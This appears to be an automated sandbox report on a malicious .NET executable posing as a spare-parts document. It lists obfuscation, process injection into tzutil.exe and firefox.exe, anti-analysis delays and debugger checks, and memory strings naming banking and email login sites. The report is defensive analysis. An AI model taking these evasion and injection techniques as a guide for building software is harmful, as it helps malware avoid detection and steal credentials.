                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: tzutil.pdbGCTL source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938382420.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 00000006.00000002.2602793009.0000000001368000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xAbOwtcTtZmjBX.exe, 00000006.00000002.2601239645.000000000044E000.00000002.00000001.01000000.0000000C.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000000.2012860631.000000000044E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.1938178930.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.1940155540.00000000031AB000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.1938178930.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.1940155540.00000000031AB000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: mSVq.pdb source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: Binary string: mSVq.pdbSHA256 source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: Binary string: tzutil.pdb source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938382420.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 00000006.00000002.2602793009.0000000001368000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.401e790.2.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7480000.3.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, fHWnEOM2Tpf5Q5oMa0.cs.Net Code: craRLN6UZw System.Reflection.Assembly.Load(byte[])
                      Source: 9.2.tzutil.exe.398cd14.2.raw.unpack, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: 10.0.xAbOwtcTtZmjBX.exe.2e3cd14.1.raw.unpack, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: 10.2.xAbOwtcTtZmjBX.exe.2e3cd14.1.raw.unpack, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: 12.2.firefox.exe.3ae5cd14.0.raw.unpack, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: 0xF3BAF958 [Thu Jul 30 17:50:16 2099 UTC]
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_02DBF362 push esp; iretd 0_2_02DBF3F1
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_07228462 push 34072610h; iretd 0_2_0722846D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_0722C341 push eax; retf 0_2_0722C342
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_07229026 pushad ; retf 0_2_07229027
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_07228C9B push eax; retf 0_2_07228C9C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_07228CC2 push esp; retf 0_2_07228CC3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_004031D0 push eax; ret 4_2_004031D2
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_004169E7 push 0F6CFD2Bh; ret 4_2_00416A18
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00423A0A push esp; ret 4_2_00423A0D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00419359 push ds; ret 4_2_0041935B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00418366 pushad ; iretd 4_2_00418367
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00408325 push dword ptr [ebx+5Dh]; ret 4_2_0040830B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00417388 push edi; ret 4_2_0041738D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00419477 push edx; ret 4_2_00419485
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00408403 push 00000074h; iretd 4_2_0040840B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00417411 push eax; ret 4_2_00417414
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00411D6F push ds; iretd 4_2_00411DBD
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00411D7B push ds; iretd 4_2_00411DBD
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0041758A push ebp; ret 4_2_004175A6
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0040D66A push ecx; iretd 4_2_0040D6D9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00414E05 push cs; retf 4_2_00414E14
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0040860D push cs; retf 4_2_0040860E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00413E93 pushfd ; ret 4_2_00413F00
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00413EBC pushfd ; ret 4_2_00413F00
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011909AD push ecx; mov dword ptr [esp], ecx4_2_011909B6
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0336225F pushad ; ret 9_2_033627F9
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033627FA pushad ; ret 9_2_033627F9
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033909AD push ecx; mov dword ptr [esp], ecx9_2_033909B6
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0336283D push eax; iretd 9_2_03362858
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AB41B5 push edi; ret 9_2_00AB41BA
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AB6186 push ds; ret 9_2_00AB6188
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: section name: .text entropy: 7.942639726228952
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, aAVqwIHAuQOWZBX44ZU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jbEYIL2w7x', 'bBAYgQQXGs', 'MBIYc65svo', 'nNaYSJThon', 'dy3Y1Y9Dk4', 'gRoYhm50Lp', 'Vy6Ydkm0Jy'
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\tzutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara matchFile source: Process Memory Space: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe PID: 7424, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D324
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D944
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D504
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D544
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF908190154
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Memory allocated: 1460000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Memory allocated: 3000000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Memory allocated: 2E00000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Memory allocated: 7E90000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Memory allocated: 8E90000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Memory allocated: 9040000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Memory allocated: A040000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_07310007 rdtsc 0_2_07310007
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe API coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\tzutil.exe API coverage: 2.6 %
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe TID: 7448 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\tzutil.exe TID: 8124 Thread sleep count: 120 > 30
                      Source: C:\Windows\SysWOW64\tzutil.exe TID: 8124 Thread sleep time: -240000s >= -30000s
                      Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00ABC9D0 FindFirstFileW,FindNextFileW,FindClose,9_2_00ABC9D0
                      Source: UQ63g7r-.9.drBinary or memory string: dev.azure.comVMware20,11696497155j
                      Source: UQ63g7r-.9.drBinary or memory string: global block list test formVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                      Source: UQ63g7r-.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                      Source: UQ63g7r-.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                      Source: UQ63g7r-.9.drBinary or memory string: tasks.office.comVMware20,11696497155o
                      Source: UQ63g7r-.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2602795351.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2247250261.000001943ADDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: UQ63g7r-.9.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                      Source: UQ63g7r-.9.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                      Source: UQ63g7r-.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                      Source: UQ63g7r-.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                      Source: UQ63g7r-.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                      Source: UQ63g7r-.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                      Source: UQ63g7r-.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: AMC password management pageVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                      Source: UQ63g7r-.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                      Source: UQ63g7r-.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                      Source: UQ63g7r-.9.drBinary or memory string: discord.comVMware20,11696497155f
                      Source: UQ63g7r-.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                      Source: UQ63g7r-.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                      Source: UQ63g7r-.9.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                      Source: UQ63g7r-.9.drBinary or memory string: outlook.office.comVMware20,11696497155s
                      Source: UQ63g7r-.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                      Source: UQ63g7r-.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                      Source: UQ63g7r-.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\tzutil.exe Process queried: DebugPort
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00417B63 LdrLoadDll,4_2_00417B63
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123E10E mov eax, dword ptr fs:[00000030h]4_2_0123E10E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]4_2_01232000
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]4_2_01232000
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]4_2_01232000
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]4_2_01232000
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118A020 mov eax, dword ptr fs:[00000030h]4_2_0118A020
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118C020 mov eax, dword ptr fs:[00000030h]4_2_0118C020
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01192050 mov eax, dword ptr fs:[00000030h]4_2_01192050
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BC073 mov eax, dword ptr fs:[00000030h]4_2_011BC073
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01216050 mov eax, dword ptr fs:[00000030h]4_2_01216050
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012280A8 mov eax, dword ptr fs:[00000030h]4_2_012280A8
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119208A mov eax, dword ptr fs:[00000030h]4_2_0119208A
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012560B8 mov eax, dword ptr fs:[00000030h]4_2_012560B8
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012560B8 mov ecx, dword ptr fs:[00000030h]4_2_012560B8
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012160E0 mov eax, dword ptr fs:[00000030h]4_2_012160E0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118C0F0 mov eax, dword ptr fs:[00000030h]4_2_0118C0F0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D20F0 mov ecx, dword ptr fs:[00000030h]4_2_011D20F0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011980E9 mov eax, dword ptr fs:[00000030h]4_2_011980E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0118A0E3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012120DE mov eax, dword ptr fs:[00000030h]4_2_012120DE
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118C310 mov ecx, dword ptr fs:[00000030h]4_2_0118C310
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B0310 mov ecx, dword ptr fs:[00000030h]4_2_011B0310
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CA30B mov eax, dword ptr fs:[00000030h]4_2_011CA30B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CA30B mov eax, dword ptr fs:[00000030h]4_2_011CA30B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CA30B mov eax, dword ptr fs:[00000030h]4_2_011CA30B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123437C mov eax, dword ptr fs:[00000030h]4_2_0123437C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]4_2_01212349
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01238350 mov ecx, dword ptr fs:[00000030h]4_2_01238350
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125A352 mov eax, dword ptr fs:[00000030h]4_2_0125A352
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121035C mov eax, dword ptr fs:[00000030h]4_2_0121035C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121035C mov eax, dword ptr fs:[00000030h]4_2_0121035C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121035C mov eax, dword ptr fs:[00000030h]4_2_0121035C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121035C mov ecx, dword ptr fs:[00000030h]4_2_0121035C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121035C mov eax, dword ptr fs:[00000030h]4_2_0121035C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121035C mov eax, dword ptr fs:[00000030h]4_2_0121035C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01188397 mov eax, dword ptr fs:[00000030h]4_2_01188397
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01188397 mov eax, dword ptr fs:[00000030h]4_2_01188397
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01188397 mov eax, dword ptr fs:[00000030h]4_2_01188397
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118E388 mov eax, dword ptr fs:[00000030h]4_2_0118E388
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118E388 mov eax, dword ptr fs:[00000030h]4_2_0118E388
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118E388 mov eax, dword ptr fs:[00000030h]4_2_0118E388
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B438F mov eax, dword ptr fs:[00000030h]4_2_011B438F
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B438F mov eax, dword ptr fs:[00000030h]4_2_011B438F
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]4_2_0119A3C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]4_2_0119A3C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]4_2_0119A3C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]4_2_0119A3C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]4_2_0119A3C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]4_2_0119A3C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011983C0 mov eax, dword ptr fs:[00000030h]4_2_011983C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011983C0 mov eax, dword ptr fs:[00000030h]4_2_011983C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011983C0 mov eax, dword ptr fs:[00000030h]4_2_011983C0
